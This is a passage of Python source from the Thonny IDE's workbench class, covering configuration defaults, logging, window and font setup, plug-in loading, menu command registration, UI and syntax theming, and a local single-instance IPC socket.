def _try_action(self, action: Callable) -> None:
try:
action()
except Exception:
self.report_exception()
def _init_configuration(self) -> None:
self._configuration_manager = try_load_configuration(thonny.CONFIGURATION_FILE)
        self._configuration_pages = []  # type: List[Tuple[str, str, Type[tk.Widget], int]]
self.set_default("general.single_instance", thonny.SINGLE_INSTANCE_DEFAULT)
self.set_default("general.ui_mode", "simple" if running_on_rpi() else "regular")
self.set_default("general.debug_mode", False)
self.set_default("general.disable_notification_sound", False)
self.set_default("general.scaling", "default")
self.set_default("general.language", languages.BASE_LANGUAGE_CODE)
self.set_default("general.font_scaling_mode", "default")
self.set_default("run.working_directory", os.path.expanduser("~"))
def _init_language(self) -> None:
"""Initialize language."""
language_code = self.get_option("general.language")
if language_code in languages.LANGUAGES_DICT:
path = os.path.join(os.path.dirname(__file__), "locale")
language = gettext.translation("thonny", path, [language_code])
language.install()
def _get_logging_level(self) -> int:
if self.in_debug_mode():
return logging.DEBUG
else:
return logging.INFO
def _init_diagnostic_logging(self) -> None:
logFormatter = logging.Formatter("%(levelname)s: %(message)s")
root_logger = logging.getLogger()
log_file = os.path.join(THONNY_USER_DIR, "frontend.log")
file_handler = logging.FileHandler(log_file, encoding="UTF-8", mode="w")
file_handler.setFormatter(logFormatter)
file_handler.setLevel(self._get_logging_level())
root_logger.addHandler(file_handler)
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setFormatter(logFormatter)
console_handler.setLevel(self._get_logging_level())
root_logger.addHandler(console_handler)
root_logger.setLevel(self._get_logging_level())
import faulthandler
fault_out = open(os.path.join(THONNY_USER_DIR, "frontend_faults.log"), mode="w")
faulthandler.enable(fault_out)
def _init_window(self) -> None:
self.title("Thonny")
self.set_default("layout.zoomed", False)
self.set_default("layout.top", 15)
self.set_default("layout.left", 150)
if self.in_simple_mode():
self.set_default("layout.width", 1050)
self.set_default("layout.height", 700)
else:
self.set_default("layout.width", 800)
self.set_default("layout.height", 650)
self.set_default("layout.w_width", 200)
self.set_default("layout.e_width", 200)
self.set_default("layout.s_height", 200)
# I don't actually need saved options for Full screen/maximize view,
# but it's easier to create menu items, if I use configuration manager's variables
self.set_default("view.full_screen", False)
self.set_default("view.maximize_view", False)
# In order to avoid confusion set these settings to False
# even if they were True when Thonny was last run
self.set_option("view.full_screen", False)
self.set_option("view.maximize_view", False)
self.geometry(
"{0}x{1}+{2}+{3}".format(
min(max(self.get_option("layout.width"), 320), self.winfo_screenwidth()),
min(max(self.get_option("layout.height"), 240), self.winfo_screenheight()),
min(max(self.get_option("layout.left"), 0), self.winfo_screenwidth() - 200),
min(max(self.get_option("layout.top"), 0), self.winfo_screenheight() - 200),
)
)
if self.get_option("layout.zoomed"):
ui_utils.set_zoomed(self, True)
self.protocol("WM_DELETE_WINDOW", self._on_close)
self.bind("<Configure>", self._on_configure, True)
def _init_icon(self) -> None:
# Window icons
if running_on_linux() and ui_utils.get_tk_version_info() >= (8, 6):
self.iconphoto(True, self.get_image("thonny.png"))
else:
icon_file = os.path.join(self.get_package_dir(), "res", "thonny.ico")
try:
self.iconbitmap(icon_file, default=icon_file)
except Exception:
try:
# seems to work in mac
self.iconbitmap(icon_file)
except Exception:
pass
def _init_menu(self) -> None:
self.option_add("*tearOff", tk.FALSE)
if lookup_style_option("Menubar", "custom", False):
self._menubar = ui_utils.CustomMenubar(
self
) # type: Union[tk.Menu, ui_utils.CustomMenubar]
if self.get_ui_mode() != "simple":
self._menubar.grid(row=0, sticky="nsew")
else:
opts = get_style_configuration("Menubar")
if "custom" in opts:
del opts["custom"]
self._menubar = tk.Menu(self, **opts)
if self.get_ui_mode() != "simple":
self["menu"] = self._menubar
self._menus = {} # type: Dict[str, tk.Menu]
self._menu_item_specs = (
{}
) # type: Dict[Tuple[str, str], MenuItem] # key is pair (menu_name, command_label)
# create standard menus in correct order
self.get_menu("file", _("File"))
self.get_menu("edit", _("Edit"))
self.get_menu("view", _("View"))
self.get_menu("run", _("Run"))
self.get_menu("tempdevice", "Device")
self.get_menu("tools", _("Tools"))
self.get_menu("help", _("Help"))
def _load_plugins(self) -> None:
# built-in plugins
import thonny.plugins # pylint: disable=redefined-outer-name
self._load_plugins_from_path(
thonny.plugins.__path__, "thonny.plugins." # type: ignore
)
# 3rd party plugins from namespace package
try:
import thonnycontrib # @UnresolvedImport
except ImportError:
# No 3rd party plugins installed
pass
else:
self._load_plugins_from_path(thonnycontrib.__path__, "thonnycontrib.")
def _load_plugins_from_path(self, path: List[str], prefix: str) -> None:
load_function_name = "load_plugin"
modules = []
for _, module_name, _ in sorted(pkgutil.iter_modules(path, prefix), key=lambda x: x[2]):
if module_name in OBSOLETE_PLUGINS:
logging.debug("Skipping plug-in %s", module_name)
else:
try:
m = importlib.import_module(module_name)
if hasattr(m, load_function_name):
modules.append(m)
except Exception:
logging.exception("Failed loading plugin '" + module_name + "'")
def module_sort_key(m):
return getattr(m, "load_order_key", m.__name__)
for m in sorted(modules, key=module_sort_key):
getattr(m, load_function_name)()
def _init_fonts(self) -> None:
# set up editor and shell fonts
self.set_default("view.io_font_family", "Courier" if running_on_mac_os() else "Courier New")
default_editor_family = "Courier New"
families = tk_font.families()
for family in ["Consolas", "Ubuntu Mono", "Menlo", "DejaVu Sans Mono"]:
if family in families:
default_editor_family = family
break
self.set_default("view.editor_font_family", default_editor_family)
if running_on_mac_os():
self.set_default("view.editor_font_size", 14)
self.set_default("view.io_font_size", 12)
elif self.in_simple_mode():
self.set_default("view.editor_font_size", 12)
self.set_default("view.io_font_size", 12)
else:
self.set_default("view.editor_font_size", 13)
self.set_default("view.io_font_size", 11)
default_font = tk_font.nametofont("TkDefaultFont")
if running_on_linux():
heading_font = tk_font.nametofont("TkHeadingFont")
heading_font.configure(weight="normal")
caption_font = tk_font.nametofont("TkCaptionFont")
caption_font.configure(weight="normal", size=default_font.cget("size"))
small_link_ratio = 0.8 if running_on_windows() else 0.7
self._fonts = [
tk_font.Font(
name="SmallLinkFont",
family=default_font.cget("family"),
size=int(default_font.cget("size") * small_link_ratio),
underline=True,
),
tk_font.Font(name="IOFont", family=self.get_option("view.io_font_family")),
tk_font.Font(
name="BoldIOFont", family=self.get_option("view.io_font_family"), weight="bold"
),
tk_font.Font(
name="UnderlineIOFont",
family=self.get_option("view.io_font_family"),
underline=True,
),
tk_font.Font(
name="ItalicIOFont", family=self.get_option("view.io_font_family"), slant="italic"
),
tk_font.Font(
name="BoldItalicIOFont",
family=self.get_option("view.io_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(name="EditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(name="SmallEditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(
name="BoldEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
),
tk_font.Font(
name="ItalicEditorFont",
family=self.get_option("view.editor_font_family"),
slant="italic",
),
tk_font.Font(
name="BoldItalicEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(
name="TreeviewFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
),
tk_font.Font(
name="BoldTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
weight="bold",
),
tk_font.Font(
name="ItalicTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
slant="italic",
),
tk_font.Font(
name="UnderlineTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
underline=1,
),
]
self.update_fonts()
def _add_main_backends(self) -> None:
self.set_default("run.backend_name", "SameAsFrontend")
self.set_default("CustomInterpreter.used_paths", [])
self.set_default("CustomInterpreter.path", "")
from thonny import running_config_page
self.add_backend(
"SameAsFrontend",
running.SameAsFrontendCPythonProxy,
_("The same interpreter which runs Thonny (default)"),
running_config_page.SameAsFrontEndConfigurationPage,
"1",
)
self.add_backend(
"CustomCPython",
running.CustomCPythonProxy,
_("Alternative Python 3 interpreter or virtual environment"),
running_config_page.CustomCPythonConfigurationPage,
"2",
)
self.add_backend(
"PrivateVenv",
running.PrivateVenvCPythonProxy,
_("A special virtual environment (deprecated)"),
running_config_page.PrivateVenvConfigurationPage,
"z",
)
def _start_runner(self) -> None:
try:
self.update_idletasks() # allow UI to complete
thonny._runner = self._runner
self._runner.start()
self._update_toolbar()
except Exception:
self.report_exception("Error when initializing backend")
def _check_init_server_loop(self) -> None:
"""Socket will listen requests from newer Thonny instances,
which try to delegate opening files to older instance"""
if not self.get_option("general.single_instance") or os.path.exists(thonny.IPC_FILE):
self._ipc_requests = None
return
self._ipc_requests = queue.Queue() # type: queue.Queue[bytes]
server_socket, actual_secret = self._create_server_socket()
server_socket.listen(10)
def server_loop():
while True:
logging.debug("Waiting for next client")
(client_socket, _) = server_socket.accept()
try:
data = bytes()
while True:
new_data = client_socket.recv(1024)
if len(new_data) > 0:
data += new_data
else:
break
proposed_secret, args = ast.literal_eval(data.decode("UTF-8"))
if proposed_secret == actual_secret:
self._ipc_requests.put(args)
# respond OK
client_socket.sendall(SERVER_SUCCESS.encode(encoding="utf-8"))
client_socket.shutdown(socket.SHUT_WR)
logging.debug("AFTER NEW REQUEST %s", client_socket)
else:
client_socket.shutdown(socket.SHUT_WR)
raise PermissionError("Wrong secret")
except Exception:
traceback.print_exc()
Thread(target=server_loop, daemon=True).start()
def _create_server_socket(self):
if running_on_windows():
server_socket = socket.socket(socket.AF_INET) # @UndefinedVariable
server_socket.bind(("127.0.0.1", 0))
# advertise the port and secret
port = server_socket.getsockname()[1]
import uuid
secret = str(uuid.uuid4())
with open(thonny.IPC_FILE, "w") as fp:
fp.write(str(port) + "\n")
fp.write(secret + "\n")
else:
server_socket = socket.socket(socket.AF_UNIX) # @UndefinedVariable
server_socket.bind(thonny.IPC_FILE)
secret = ""
os.chmod(thonny.IPC_FILE, 0o600)
return server_socket, secret
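    # Client-side sketch of this IPC handshake, inferred from server_loop above
    # (the file path argument is illustrative): connect to the advertised socket,
    # send repr((secret, args)) as UTF-8, close the write side, then expect "OK":
    #   client.sendall(repr((secret, ["/path/to/file.py"])).encode("UTF-8"))
    #   client.shutdown(socket.SHUT_WR)
    #   assert client.recv(1024).decode("utf-8") == SERVER_SUCCESS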
def _init_commands(self) -> None:
self.add_command(
"exit",
"file",
_("Exit"),
self._on_close,
default_sequence=select_sequence("<Alt-F4>", "<Command-q>", "<Control-q>"),
extra_sequences=["<Alt-F4>"]
if running_on_linux()
else ["<Control-q>"]
if running_on_windows()
else [],
)
self.add_command("show_options", "tools", _("Options..."), self.show_options, group=180)
self.createcommand("::tk::mac::ShowPreferences", self.show_options)
self.createcommand("::tk::mac::Quit", self._mac_quit)
self.add_command(
"increase_font_size",
"view",
_("Increase font size"),
lambda: self._change_font_size(1),
default_sequence=select_sequence("<Control-plus>", "<Command-Shift-plus>"),
extra_sequences=["<Control-KP_Add>"],
group=60,
)
self.add_command(
"decrease_font_size",
"view",
_("Decrease font size"),
lambda: self._change_font_size(-1),
default_sequence=select_sequence("<Control-minus>", "<Command-minus>"),
extra_sequences=["<Control-KP_Subtract>"],
group=60,
)
self.bind("<Control-MouseWheel>", self._cmd_zoom_with_mouse, True)
self.add_command(
"focus_editor",
"view",
_("Focus editor"),
self._cmd_focus_editor,
default_sequence=select_sequence("<Alt-e>", "<Command-Alt-e>"),
group=70,
)
self.add_command(
"focus_shell",
"view",
_("Focus shell"),
self._cmd_focus_shell,
default_sequence=select_sequence("<Alt-s>", "<Command-Alt-s>"),
group=70,
)
if self.get_ui_mode() == "expert":
self.add_command(
"toggle_maximize_view",
"view",
_("Maximize view"),
self._cmd_toggle_maximize_view,
flag_name="view.maximize_view",
default_sequence=None,
group=80,
)
self.bind_class("TNotebook", "<Double-Button-1>", self._maximize_view, True)
self.bind("<Escape>", self._unmaximize_view, True)
self.add_command(
"toggle_maximize_view",
"view",
_("Full screen"),
self._cmd_toggle_full_screen,
flag_name="view.full_screen",
default_sequence=select_sequence("<F11>", "<Command-Shift-F>"),
group=80,
)
if self.in_simple_mode():
self.add_command(
"font",
"tools",
_("Change font size"),
caption=_("Zoom"),
handler=self._toggle_font_size,
image="zoom",
include_in_toolbar=True,
)
self.add_command(
"quit",
"help",
_("Exit Thonny"),
self._on_close,
image="quit",
caption=_("Quit"),
include_in_toolbar=True,
group=101,
)
if self.in_debug_mode():
self.bind_all("<Control-Shift-Alt-D>", self._print_state_for_debugging, True)
def _print_state_for_debugging(self, event) -> None:
print(get_runner()._postponed_commands)
def _init_containers(self) -> None:
        # Main frame functions as
        # - a background behind the padding of main_pw; without this OS X leaves a white border
        # - a container to be hidden when a view is maximized, and restored when the view comes back home
        main_frame = ttk.Frame(self)
self._main_frame = main_frame
main_frame.grid(row=1, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
self._maximized_view = None # type: Optional[tk.Widget]
self._toolbar = ttk.Frame(main_frame, padding=0)
self._toolbar.grid(column=0, row=0, sticky=tk.NSEW, padx=10, pady=(5, 0))
self.set_default("layout.west_pw_width", self.scale(150))
self.set_default("layout.east_pw_width", self.scale(150))
self.set_default("layout.s_nb_height", self.scale(150))
self.set_default("layout.nw_nb_height", self.scale(150))
self.set_default("layout.sw_nb_height", self.scale(150))
self.set_default("layout.ne_nb_height", self.scale(150))
self.set_default("layout.se_nb_height", self.scale(150))
self._main_pw = AutomaticPanedWindow(main_frame, orient=tk.HORIZONTAL)
self._main_pw.grid(column=0, row=1, sticky=tk.NSEW, padx=10, pady=10)
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
self._west_pw = AutomaticPanedWindow(
self._main_pw,
1,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.west_pw_width"),
)
self._center_pw = AutomaticPanedWindow(self._main_pw, 2, orient=tk.VERTICAL)
self._east_pw = AutomaticPanedWindow(
self._main_pw,
3,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.east_pw_width"),
)
self._view_notebooks = {
"nw": AutomaticNotebook(
self._west_pw, 1, preferred_size_in_pw=self.get_option("layout.nw_nb_height")
),
"w": AutomaticNotebook(self._west_pw, 2),
"sw": AutomaticNotebook(
self._west_pw, 3, preferred_size_in_pw=self.get_option("layout.sw_nb_height")
),
"s": AutomaticNotebook(
self._center_pw, 3, preferred_size_in_pw=self.get_option("layout.s_nb_height")
),
"ne": AutomaticNotebook(
self._east_pw, 1, preferred_size_in_pw=self.get_option("layout.ne_nb_height")
),
"e": AutomaticNotebook(self._east_pw, 2),
"se": AutomaticNotebook(
self._east_pw, 3, preferred_size_in_pw=self.get_option("layout.se_nb_height")
),
}
for nb_name in self._view_notebooks:
self.set_default("layout.notebook_" + nb_name + "_visible_view", None)
self._editor_notebook = EditorNotebook(self._center_pw)
self._editor_notebook.position_key = 1 # type: ignore
self._center_pw.insert("auto", self._editor_notebook)
def _init_theming(self) -> None:
self._style = ttk.Style()
self._ui_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleUiThemeSettings, Dict[str, str]]] # value is (parent, settings, images)
self._syntax_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleSyntaxThemeSettings]] # value is (parent, settings)
self.set_default("view.ui_theme", ui_utils.get_default_theme())
def add_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]] = None,
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences=False,
) -> None:
"""Registers an item to be shown in specified menu.
Args:
menu_name: Name of the menu the command should appear in.
Standard menu names are "file", "edit", "run", "view", "help".
                If a menu with the given name doesn't exist, a new menu is created
                (with label=name).
command_label: Label for this command
handler: Function to be called when the command is invoked.
Should be callable with one argument (the event or None).
tester: Function to be called for determining if command is available or not.
Should be callable with one argument (the event or None).
Should return True or False.
If None then command is assumed to be always available.
default_sequence: Default shortcut (Tk style)
flag_name: Used for toggle commands. Indicates the name of the boolean option.
group: Used for grouping related commands together. Value should be int.
                Groups with smaller numbers appear first.
Returns:
None
"""
# Temporary solution for plug-ins made for versions before 3.2
if menu_name == "device":
menu_name = "tools"
group = 150
# store command to be published later
self._commands.append(
dict(
command_id=command_id,
menu_name=menu_name,
command_label=command_label,
handler=handler,
tester=tester,
default_sequence=default_sequence,
extra_sequences=extra_sequences,
flag_name=flag_name,
skip_sequence_binding=skip_sequence_binding,
accelerator=accelerator,
group=group,
position_in_group=position_in_group,
image=image,
caption=caption,
alternative_caption=alternative_caption,
include_in_menu=include_in_menu,
include_in_toolbar=include_in_toolbar,
submenu=submenu,
bell_when_denied=bell_when_denied,
show_extra_sequences=show_extra_sequences,
)
)
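    # Example registration (a hypothetical plug-in command; all names below are
    # illustrative, not part of Thonny's built-in command set):
    #   get_workbench().add_command(
    #       "hello", "tools", "Say hello",
    #       handler=lambda: print("hello"),
    #       default_sequence="<Control-Alt-h>",
    #       group=50)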
def _publish_commands(self) -> None:
for cmd in self._commands:
self._publish_command(**cmd)
def _publish_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]],
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences: bool = False,
) -> None:
def dispatch(event=None):
if not tester or tester():
denied = False
handler()
else:
denied = True
logging.debug("Command '" + command_id + "' execution denied")
if bell_when_denied:
self.bell()
self.event_generate("UICommandDispatched", command_id=command_id, denied=denied)
sequence_option_name = "shortcuts." + command_id
self.set_default(sequence_option_name, default_sequence)
sequence = self.get_option(sequence_option_name)
if sequence:
if not skip_sequence_binding:
self.bind_all(sequence, dispatch, True)
# register shortcut even without binding
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
for extra_sequence in extra_sequences:
self.bind_all(extra_sequence, dispatch, True)
if "greek_" not in extra_sequence.lower() or running_on_linux():
# Use greek alternatives only on Linux
# (they are not required on Mac
# and cause double events on Windows)
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
menu = self.get_menu(menu_name)
if image:
_image = self.get_image(image) # type: Optional[tk.PhotoImage]
else:
_image = None
if not accelerator and sequence:
accelerator = sequence_to_accelerator(sequence)
"""
# Does not work on Mac
if show_extra_sequences:
for extra_seq in extra_sequences:
accelerator += " or " + sequence_to_accelerator(extra_seq)
"""
if include_in_menu:
def dispatch_from_menu():
                # I don't like that the Tk menu toggles the checkbutton variable
                # automatically before calling the handler.
                # So I revert the toggle before calling the actual handler.
                # This way the handler doesn't have to worry about whether it
                # needs to toggle the variable or not, and it can choose to
                # decline the toggle.
if flag_name is not None:
var = self.get_variable(flag_name)
var.set(not var.get())
dispatch(None)
if _image and lookup_style_option("OPTIONS", "icons_in_menus", True):
menu_image = _image # type: Optional[tk.PhotoImage]
elif flag_name:
                # no image or blank next to a checkbox
menu_image = None
else:
menu_image = self.get_image("16x16-blank")
# remember the details that can't be stored in Tkinter objects
self._menu_item_specs[(menu_name, command_label)] = MenuItem(
group, position_in_group, tester
)
menu.insert(
self._find_location_for_menu_item(menu_name, command_label),
"checkbutton" if flag_name else "cascade" if submenu else "command",
label=command_label,
accelerator=accelerator,
image=menu_image,
compound=tk.LEFT,
variable=self.get_variable(flag_name) if flag_name else None,
command=dispatch_from_menu if handler else None,
menu=submenu,
)
if include_in_toolbar:
toolbar_group = self._get_menu_index(menu) * 100 + group
assert caption is not None
self._add_toolbar_button(
command_id,
_image,
command_label,
caption,
caption if alternative_caption is None else alternative_caption,
accelerator,
handler,
tester,
toolbar_group,
)
def add_view(
self,
cls: Type[tk.Widget],
label: str,
default_location: str,
visible_by_default: bool = False,
default_position_key: Optional[str] = None,
) -> None:
"""Adds item to "View" menu for showing/hiding given view.
Args:
view_class: Class or constructor for view. Should be callable with single
argument (the master of the view)
label: Label of the view tab
location: Location descriptor. Can be "nw", "sw", "s", "se", "ne"
Returns: None
"""
view_id = cls.__name__
        if default_position_key is None:
default_position_key = label
self.set_default("view." + view_id + ".visible", visible_by_default)
self.set_default("view." + view_id + ".location", default_location)
self.set_default("view." + view_id + ".position_key", default_position_key)
if self.in_simple_mode():
visibility_flag = tk.BooleanVar(value=view_id in SIMPLE_MODE_VIEWS)
else:
visibility_flag = cast(tk.BooleanVar, self.get_variable("view." + view_id + ".visible"))
self._view_records[view_id] = {
"class": cls,
"label": label,
"location": self.get_option("view." + view_id + ".location"),
"position_key": self.get_option("view." + view_id + ".position_key"),
"visibility_flag": visibility_flag,
}
# handler
def toggle_view_visibility():
if visibility_flag.get():
self.hide_view(view_id)
else:
self.show_view(view_id, True)
self.add_command(
"toggle_" + view_id,
menu_name="view",
command_label=label,
handler=toggle_view_visibility,
flag_name="view." + view_id + ".visible",
group=10,
position_in_group="alphabetic",
)
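    # Example (MyToolView is a hypothetical view class; any widget constructor
    # taking a single master argument works):
    #   get_workbench().add_view(MyToolView, "My tool", "se", visible_by_default=False)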
def add_configuration_page(
self, key: str, title: str, page_class: Type[tk.Widget], order: int
) -> None:
self._configuration_pages.append((key, title, page_class, order))
def add_content_inspector(self, inspector_class: Type) -> None:
self.content_inspector_classes.append(inspector_class)
def add_backend(
self,
name: str,
proxy_class: Type[BackendProxy],
description: str,
config_page_constructor,
sort_key=None,
) -> None:
self._backends[name] = BackendSpec(
name,
proxy_class,
description,
config_page_constructor,
sort_key if sort_key is not None else description,
)
        # assign names to related classes
proxy_class.backend_name = name # type: ignore
if not getattr(config_page_constructor, "backend_name", None):
config_page_constructor.backend_name = name
def add_ui_theme(
self,
name: str,
parent: Union[str, None],
settings: FlexibleUiThemeSettings,
images: Dict[str, str] = {},
) -> None:
if name in self._ui_themes:
warn(_("Overwriting theme '%s'") % name)
self._ui_themes[name] = (parent, settings, images)
def add_syntax_theme(
self, name: str, parent: Optional[str], settings: FlexibleSyntaxThemeSettings
) -> None:
if name in self._syntax_themes:
warn(_("Overwriting theme '%s'") % name)
self._syntax_themes[name] = (parent, settings)
def get_usable_ui_theme_names(self) -> Sequence[str]:
return sorted([name for name in self._ui_themes if self._ui_themes[name][0] is not None])
def get_syntax_theme_names(self) -> Sequence[str]:
return sorted(self._syntax_themes.keys())
def get_ui_mode(self) -> str:
return self._active_ui_mode
def in_simple_mode(self) -> bool:
return self.get_ui_mode() == "simple"
def scale(self, value: Union[int, float]) -> int:
if isinstance(value, (int, float)):
# using int instead of round so that thin lines will stay
# one pixel even with scaling_factor 1.67
result = int(self._scaling_factor * value)
if result == 0 and value > 0:
# don't lose thin lines because of scaling
return 1
else:
return result
else:
raise NotImplementedError("Only numeric dimensions supported at the moment")
def _register_ui_theme_as_tk_theme(self, name: str) -> None:
# collect settings from all ancestors
total_settings = [] # type: List[FlexibleUiThemeSettings]
total_images = {} # type: Dict[str, str]
temp_name = name
while True:
parent, settings, images = self._ui_themes[temp_name]
total_settings.insert(0, settings)
for img_name in images:
total_images.setdefault(img_name, images[img_name])
if parent is not None:
temp_name = parent
else:
# reached start of the chain
break
assert temp_name in self._style.theme_names()
# only root of the ancestors is relevant for theme_create,
# because the method actually doesn't take parent settings into account
# (https://mail.python.org/pipermail/tkinter-discuss/2015-August/003752.html)
self._style.theme_create(name, temp_name)
self._image_mapping_by_theme[name] = total_images
# load images
self.get_image("tab-close", "img_close")
self.get_image("tab-close-active", "img_close_active")
# apply settings starting from root ancestor
for settings in total_settings:
if callable(settings):
settings = settings()
if isinstance(settings, dict):
self._style.theme_settings(name, settings)
else:
for subsettings in settings:
self._style.theme_settings(name, subsettings)
def _apply_ui_theme(self, name: str) -> None:
self._current_theme_name = name
if name not in self._style.theme_names():
self._register_ui_theme_as_tk_theme(name)
self._style.theme_use(name)
# https://wiki.tcl.tk/37973#pagetocfe8b22ab
for setting in ["background", "foreground", "selectBackground", "selectForeground"]:
value = self._style.lookup("Listbox", setting)
if value:
self.option_add("*TCombobox*Listbox." + setting, value)
self.option_add("*Listbox." + setting, value)
text_opts = self._style.configure("Text")
if text_opts:
for key in text_opts:
self.option_add("*Text." + key, text_opts[key])
if hasattr(self, "_menus"):
# if menus have been initialized, ie. when theme is being changed
for menu in self._menus.values():
menu.configure(get_style_configuration("Menu"))
self.update_fonts()
def _apply_syntax_theme(self, name: str) -> None:
def get_settings(name):
try:
parent, settings = self._syntax_themes[name]
except KeyError:
self.report_exception("Can't find theme '%s'" % name)
return {}
if callable(settings):
settings = settings()
if parent is None:
return settings
else:
result = get_settings(parent)
for key in settings:
if key in result:
result[key].update(settings[key])
else:
result[key] = settings[key]
return result
from thonny import codeview
codeview.set_syntax_options(get_settings(name))
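    # Worked example of the recursive merge in get_settings above: with a parent
    # theme defining {"string": {"foreground": "green", "font": "EditorFont"}} and
    # a child overriding {"string": {"foreground": "olive"}}, the child wins per
    # key and the merged result keeps the parent's "font":
    #   {"string": {"foreground": "olive", "font": "EditorFont"}}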
def reload_themes(self) -> None:
preferred_theme = self.get_option("view.ui_theme")
available_themes = self.get_usable_ui_theme_names()
if preferred_theme in available_themes:
self._apply_ui_theme(preferred_theme)
elif "Enhanced Clam" in available_themes:
self._apply_ui_theme("Enhanced Clam")
elif "Windows" in available_themes:
self._apply_ui_theme("Windows")
self._apply_syntax_theme(self.get_option("view.syntax_theme"))
def uses_dark_ui_theme(self) -> bool:
name = self._style.theme_use()
while True:
if "dark" in name.lower():
return True
name, _, _ = self._ui_themes[name]
if name is None:
# reached start of the chain
break
return False
def _init_program_arguments_frame(self) -> None:
self.set_default("view.show_program_arguments", False)
self.set_default("run.program_arguments", "")
self.set_default("run.past_program_arguments", [])
visibility_var = self.get_variable("view.show_program_arguments")
content_var = self.get_variable("run.program_arguments")
frame = ttk.Frame(self._toolbar)
col = 1000
self._toolbar.columnconfigure(col, weight=1)
label = ttk.Label(frame, text=_("Program arguments:"))
label.grid(row=0, column=0, sticky="nse", padx=5)
self.program_arguments_box = ttk.Combobox(
frame,
width=80,
height=15,
textvariable=content_var,
values=[""] + self.get_option("run.past_program_arguments"),
)
self.program_arguments_box.grid(row=0, column=1, sticky="nsew", padx=5)
frame.columnconfigure(1, weight=1)
def update_visibility():
if visibility_var.get():
if not frame.winfo_ismapped():
frame.grid(row=0, column=col, sticky="nse")
else:
if frame.winfo_ismapped():
frame.grid_remove()
def toggle():
visibility_var.set(not visibility_var.get())
update_visibility()
self.add_command(
"viewargs",
"view",
_("Program arguments"),
toggle,
flag_name="view.show_program_arguments",
group=11,
)
update_visibility()
def _init_regular_mode_link(self):
if self.get_ui_mode() != "simple":
return
label = ttk.Label(
self._toolbar,
text=_("Switch to\nregular\nmode"),
justify="right",
font="SmallLinkFont",
style="Url.TLabel",
cursor="hand2",
)
label.grid(row=0, column=1001, sticky="ne")
def on_click(event):
self.set_option("general.ui_mode", "regular")
tk.messagebox.showinfo(
_("Regular mode"),
_(
"Configuration has been updated. "
+ "Restart Thonny to start working in regular mode.\n\n"
+ "(See 'Tools → Options → General' if you change your mind later.)"
),
)
label.bind("<1>", on_click, True)
def log_program_arguments_string(self, arg_str: str) -> None:
arg_str = arg_str.strip()
self.set_option("run.program_arguments", arg_str)
if arg_str == "":
# empty will be handled differently
return
past_args = self.get_option("run.past_program_arguments")
if arg_str in past_args:
past_args.remove(arg_str)
past_args.insert(0, arg_str)
past_args = past_args[:10]
self.set_option("run.past_program_arguments", past_args)
self.program_arguments_box.configure(values=[""] + past_args)
def _show_views(self) -> None:
for view_id in self._view_records:
if self._view_records[view_id]["visibility_flag"].get():
try:
self.show_view(view_id, False)
except Exception:
self.report_exception("Problem showing " + view_id)
def update_image_mapping(self, mapping: Dict[str, str]) -> None:
"""Was used by thonny-pi. Not recommended anymore"""
self._default_image_mapping.update(mapping)
def get_backends(self) -> Dict[str, BackendSpec]:
return self._backends
def get_option(self, name: str, default=None) -> Any:
# Need to return Any, otherwise each typed call site needs to cast
return self._configuration_manager.get_option(name, default)
def set_option(self, name: str, value: Any) -> None:
self._configuration_manager.set_option(name, value)
def get_local_cwd(self) -> str:
cwd = self.get_option("run.working_directory")
if os.path.exists(cwd):
return normpath_with_actual_case(cwd)
else:
return normpath_with_actual_case(os.path.expanduser("~"))
def set_local_cwd(self, value: str) -> None:
if self.get_option("run.working_directory") != value:
self.set_option("run.working_directory", value)
if value:
self.event_generate("LocalWorkingDirectoryChanged", cwd=value)
def set_default(self, name: str, default_value: Any) -> None:
"""Registers a new option.
If the name contains a period, then the part left to the (first) period
will become the section of the option and rest will become name under that
section.
If the name doesn't contain a period, then it will be added under section
"general".
"""
self._configuration_manager.set_default(name, default_value)
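    # e.g. set_default("myplugin.enabled", True) registers option "enabled" under
    # section "myplugin", while set_default("debug_mode", False) lands under
    # "general" ("myplugin" is an illustrative section name).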
def get_variable(self, name: str) -> tk.Variable:
return self._configuration_manager.get_variable(name)
def get_menu(self, name: str, label: Optional[str] = None) -> tk.Menu:
"""Gives the menu with given name. Creates if not created yet.
Args:
name: meant to be used as not translatable menu name
label: translated label, used only when menu with given name doesn't exist yet
"""
if name not in self._menus:
if running_on_mac_os():
conf = {}
else:
conf = get_style_configuration("Menu")
menu = tk.Menu(self._menubar, **conf)
menu["postcommand"] = lambda: self._update_menu(menu, name)
